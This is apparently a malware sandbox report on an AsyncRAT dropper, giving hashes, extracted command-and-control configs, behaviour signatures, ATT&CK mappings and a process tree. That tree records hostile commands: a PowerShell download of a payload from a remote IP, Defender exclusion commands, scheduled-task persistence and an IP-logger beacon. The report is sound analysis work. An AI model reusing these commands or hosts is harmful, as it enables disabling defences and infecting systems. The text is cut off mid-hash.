asyncrat | 69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31

Analysis

max time kernel
41s
max time network
47s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
01/06/2024, 15:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.exe
Size

4KB
MD5

a239a27c2169af388d4f5be6b52f272c
SHA1

0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
SHA256

98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
SHA512

f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
SSDEEP

48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt

Score

10^/10

asyncrat default fresh bootkit discovery execution persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://94.103.188.126/jerry/putty.zip

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

192.168.1.2:1800

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

Fresh

pepecasas123.net:4608

Mutex

AsyncMutex_5952

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
59	4484	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3248	powershell.exe
5280	powershell.exe
4484	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	New Text Document.exe

Executes dropped EXE 13 IoCs

pid	Process
3624	volumeinfo.exe
4508	55.exe
3200	3.exe
4440	munqk.exe
2276	17.exe
4832	network.exe
1004	maikati.exe
4732	Zinker.exe
4204	smartsoftsignew.exe
4888	ADServices.exe
3688	New.exe
620	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
4548	putty.exe

Loads dropped DLL 3 IoCs

pid	Process
4204	smartsoftsignew.exe
4204	smartsoftsignew.exe
620	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
93	iplogger.com
30	raw.githubusercontent.com
31	raw.githubusercontent.com
90	iplogger.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3200 set thread context of 2804	3200	3.exe	100
PID 4832 set thread context of 3148	4832	network.exe	108
PID 4732 set thread context of 3380	4732	Zinker.exe	117

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2908	2804	WerFault.exe	100
2320	4832	WerFault.exe	105

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5000	schtasks.exe
2152	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	27	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
3248	powershell.exe
3248	powershell.exe
3248	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
2388	msedge.exe
2388	msedge.exe
1648	msedge.exe
1648	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
1648	msedge.exe
1648	msedge.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2960	New Text Document.exe
Token: SeDebugPrivilege	3624	volumeinfo.exe
Token: SeDebugPrivilege	3248	powershell.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeManageVolumePrivilege	620	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
4508	55.exe
620	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
4508	55.exe
620	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe
1648	msedge.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3200	3.exe
4440	munqk.exe
2276	17.exe
4832	network.exe
1004	maikati.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2960 wrote to memory of 3624	2960	New Text Document.exe	91
PID 2960 wrote to memory of 3624	2960	New Text Document.exe	91
PID 2960 wrote to memory of 3624	2960	New Text Document.exe	91
PID 2960 wrote to memory of 4508	2960	New Text Document.exe	95
PID 2960 wrote to memory of 4508	2960	New Text Document.exe	95
PID 2960 wrote to memory of 4508	2960	New Text Document.exe	95
PID 2960 wrote to memory of 3200	2960	New Text Document.exe	97
PID 2960 wrote to memory of 3200	2960	New Text Document.exe	97
PID 2960 wrote to memory of 3200	2960	New Text Document.exe	97
PID 2960 wrote to memory of 4440	2960	New Text Document.exe	98
PID 2960 wrote to memory of 4440	2960	New Text Document.exe	98
PID 2960 wrote to memory of 4440	2960	New Text Document.exe	98
PID 2960 wrote to memory of 2276	2960	New Text Document.exe	99
PID 2960 wrote to memory of 2276	2960	New Text Document.exe	99
PID 2960 wrote to memory of 2276	2960	New Text Document.exe	99
PID 3200 wrote to memory of 2804	3200	3.exe	100
PID 3200 wrote to memory of 2804	3200	3.exe	100
PID 3200 wrote to memory of 2804	3200	3.exe	100
PID 3200 wrote to memory of 2804	3200	3.exe	100
PID 3200 wrote to memory of 2804	3200	3.exe	100
PID 3200 wrote to memory of 2804	3200	3.exe	100
PID 3200 wrote to memory of 2804	3200	3.exe	100
PID 3200 wrote to memory of 2804	3200	3.exe	100
PID 2276 wrote to memory of 3248	2276	17.exe	101
PID 2276 wrote to memory of 3248	2276	17.exe	101
PID 2276 wrote to memory of 3248	2276	17.exe	101
PID 2960 wrote to memory of 4832	2960	New Text Document.exe	105
PID 2960 wrote to memory of 4832	2960	New Text Document.exe	105
PID 2960 wrote to memory of 4832	2960	New Text Document.exe	105
PID 2960 wrote to memory of 1004	2960	New Text Document.exe	107
PID 2960 wrote to memory of 1004	2960	New Text Document.exe	107
PID 2960 wrote to memory of 1004	2960	New Text Document.exe	107
PID 4832 wrote to memory of 3148	4832	network.exe	108
PID 4832 wrote to memory of 3148	4832	network.exe	108
PID 4832 wrote to memory of 3148	4832	network.exe	108
PID 4832 wrote to memory of 3148	4832	network.exe	108
PID 4832 wrote to memory of 3148	4832	network.exe	108
PID 2960 wrote to memory of 4732	2960	New Text Document.exe	111
PID 2960 wrote to memory of 4732	2960	New Text Document.exe	111
PID 2960 wrote to memory of 4732	2960	New Text Document.exe	111
PID 4732 wrote to memory of 4620	4732	Zinker.exe	114
PID 4732 wrote to memory of 4620	4732	Zinker.exe	114
PID 4732 wrote to memory of 4620	4732	Zinker.exe	114
PID 4732 wrote to memory of 648	4732	Zinker.exe	115
PID 4732 wrote to memory of 648	4732	Zinker.exe	115
PID 4732 wrote to memory of 648	4732	Zinker.exe	115
PID 4732 wrote to memory of 4556	4732	Zinker.exe	116
PID 4732 wrote to memory of 4556	4732	Zinker.exe	116
PID 4732 wrote to memory of 4556	4732	Zinker.exe	116
PID 4732 wrote to memory of 3380	4732	Zinker.exe	117
PID 4732 wrote to memory of 3380	4732	Zinker.exe	117
PID 4732 wrote to memory of 3380	4732	Zinker.exe	117
PID 4732 wrote to memory of 3380	4732	Zinker.exe	117
PID 4732 wrote to memory of 3380	4732	Zinker.exe	117
PID 4732 wrote to memory of 3380	4732	Zinker.exe	117
PID 4732 wrote to memory of 3380	4732	Zinker.exe	117
PID 4732 wrote to memory of 3380	4732	Zinker.exe	117
PID 4732 wrote to memory of 3380	4732	Zinker.exe	117
PID 4732 wrote to memory of 3380	4732	Zinker.exe	117
PID 4732 wrote to memory of 3380	4732	Zinker.exe	117
PID 4732 wrote to memory of 3380	4732	Zinker.exe	117
PID 2960 wrote to memory of 4204	2960	New Text Document.exe	118
PID 2960 wrote to memory of 4204	2960	New Text Document.exe	118
PID 2960 wrote to memory of 4204	2960	New Text Document.exe	118

C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2960
- C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
  "C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3624
- C:\Users\Admin\AppData\Local\Temp\a\55.exe
  "C:\Users\Admin\AppData\Local\Temp\a\55.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4508
- C:\Users\Admin\AppData\Local\Temp\a\3.exe
  "C:\Users\Admin\AppData\Local\Temp\a\3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3200
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:2804
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 12
      4⤵
      Program crash
      PID:2908
- C:\Users\Admin\AppData\Local\Temp\a\munqk.exe
  "C:\Users\Admin\AppData\Local\Temp\a\munqk.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4440
- C:\Users\Admin\AppData\Local\Temp\a\17.exe
  "C:\Users\Admin\AppData\Local\Temp\a\17.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'C:\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3248
- C:\Users\Admin\AppData\Local\Temp\a\network.exe
  "C:\Users\Admin\AppData\Local\Temp\a\network.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4832
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    -arguments
    3⤵
    PID:3148
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 612
    3⤵
    - Program crash
    PID:2320
- C:\Users\Admin\AppData\Local\Temp\a\maikati.exe
  "C:\Users\Admin\AppData\Local\Temp\a\maikati.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1004
- C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4732
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4620
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:648
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4556
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3380
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:5000
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:2152
- C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
  "C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4204
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
    3⤵
    PID:1668
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4484
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:1648
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7ff8520346f8,0x7ff852034708,0x7ff852034718
        5⤵
        
        PID:2020
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2
        5⤵
        
        PID:1536
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2388
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
        5⤵
        
        PID:1652
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
        5⤵
        
        PID:216
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
        5⤵
        
        PID:1280
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
        5⤵
        
        PID:5052
  - - C:\Windows\SysWOW64\tar.exe
      tar -xf putty.zip
      4⤵
      PID:2184
  - - C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
      C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
      4⤵
      Executes dropped EXE
      PID:4548
- C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe"
  2⤵
  - Executes dropped EXE
  PID:4888
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    3⤵
    PID:5484
- C:\Users\Admin\AppData\Local\Temp\a\New.exe
  "C:\Users\Admin\AppData\Local\Temp\a\New.exe"
  2⤵
  - Executes dropped EXE
  PID:3688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\New.exe" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5280
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
    3⤵
    PID:5316
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    3⤵
    PID:5500
- C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
  "C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2804 -ip 2804
1⤵
PID:2152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4832 -ip 4832
1⤵
PID:4584

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4536

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Pre-OS Boot

T1542

Bootkit

T1542.003

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ea98e583ad99df195d29aa066204ab56

SHA1
f89398664af0179641aa0138b337097b617cb2db

SHA256
a7abb51435909fa2d75c6f2ff5c69a93d4a0ab276ed579e7d8733b2a63ffbee6

SHA512
e109be3466e653e5d310b3e402e1626298b09205d223722a82344dd78504f3c33e1e24e8402a02f38cd2c9c50d96a303ce4846bea5a583423937ab018cd5782f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4f7152bc5a1a715ef481e37d1c791959

SHA1
c8a1ed674c62ae4f45519f90a8cc5a81eff3a6d7

SHA256
704dd4f98d8ca34ec421f23ba1891b178c23c14b3301e4655efc5c02d356c2bc

SHA512
2e6b02ca35d76a655a17a5f3e9dbd8d7517c7dae24f0095c7350eb9e7bdf9e1256a7009aa8878f96c89d1ea4fe5323a41f72b8c551806dda62880d7ff231ff5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
f35ebabea3c72e7e3592d8579466e809

SHA1
5dba94f1ac3ff3dc53ec551045989688870911b3

SHA256
a4ecc4d400e6f657d6eaab20b2a1a65879266dec7ce55b1df04d89eddf6e4017

SHA512
7f3fa07e231ea803ac400706a5be9c8678f8fba6c718335c35e13983b281488737037e663a65842888bf4bf18f50434c5bc0b401f80913fb23e02b27825a18ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
97cc569c9c7b2be6e68a9922c460c6c6

SHA1
02e654678b61e1b4c3fe6d14f38240fa09b33627

SHA256
752ca416ea5cd4635b6227bbb5c568d2bcf3c2e0e48c7809aa83e16cbb2dc7fd

SHA512
12e7e08dbc5af14633506a82591b806e0a10616a67f36d996e1c624efc84016366153019257d1d96284a07b5838b2cff776ae2709213ec528d4867d9b826e0f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
3156cafb50c37e6491b22084c60d4ce0

SHA1
c148c1217e3eed6ec3acaf8a9a020dc036d7d8f7

SHA256
a3eeca9076a1efaa46c5f63e4cd12fe84766a46f6c7013aa1f2f4bf361543010

SHA512
968186a0a54ec1e107ea914f9de28cf677c6674093ea179eed03c0448fa19c40fbbb421fdc13101d49ab213760812ef7c792102d1b8e41421c8462c483bf3a06

Download Submit
C:\Users\Admin\AppData\Local\Temp\[email protected]

Filesize
656B

MD5
184a117024f3789681894c67b36ce990

SHA1
c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e

SHA256
b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e

SHA512
354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini

Filesize
830B

MD5
e6edb41c03bce3f822020878bde4e246

SHA1
03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9

SHA256
9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454

SHA512
2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_33kbu4xy.pvi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\17.exe

Filesize
16KB

MD5
7ba50890ab7bfc1dd9e88c182a689fb9

SHA1
33d4767c38e5586511a94ed03900495777bd4029

SHA256
080aaaa296ddc41c2a448d2d39652608994dbe17019cd3fcb081d89ad3acad15

SHA512
92a245d09c4c55c99915a94d762128f4ac3d6c2705d06d2b6c62243c654e9209233b28aa928f10e473672422673febd36281981826a4d361201403a3d56237bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\3.exe

Filesize
28KB

MD5
2eb0ac82f49347944e4ef29cb53eca48

SHA1
c28c8c943d7ccc805cbc5cdc5f697d1ee3815b0f

SHA256
86c8da270e82ac4d2e27ac6ec56d7dd1df44d2bcb9ce22e008d9647fdba87243

SHA512
6e9f916a6239b27ef4120ffd235409c9476cc49fdecbfff31fc5c15cb5769b39107ea4e1d93c61f60ec3df22ea5d09723a42d6287e7b52f77843357f04a8e327

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

Filesize
1.4MB

MD5
2de14d82238bf5395e0b95e551ab8e00

SHA1
f9c7f00ad7c624d190e06cda3c5adf02bb207074

SHA256
aa9d5004f89fe3952e5ee0b148e6a36574d372bb5ffadae5733a7ee77127f8d4

SHA512
9a5f2f781b52ea793021bf641a8be95f9611bfe936e9bd96978ec9066b4a7390b847f2e597cfd9ac69de9ac35b7238147538a23c3a27313d19c16258e2446f2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\55.exe

Filesize
430KB

MD5
821f6662f6e721a43d020dc488a4a040

SHA1
d272ea0525684d2466ce0d58ad13a90e28bd1949

SHA256
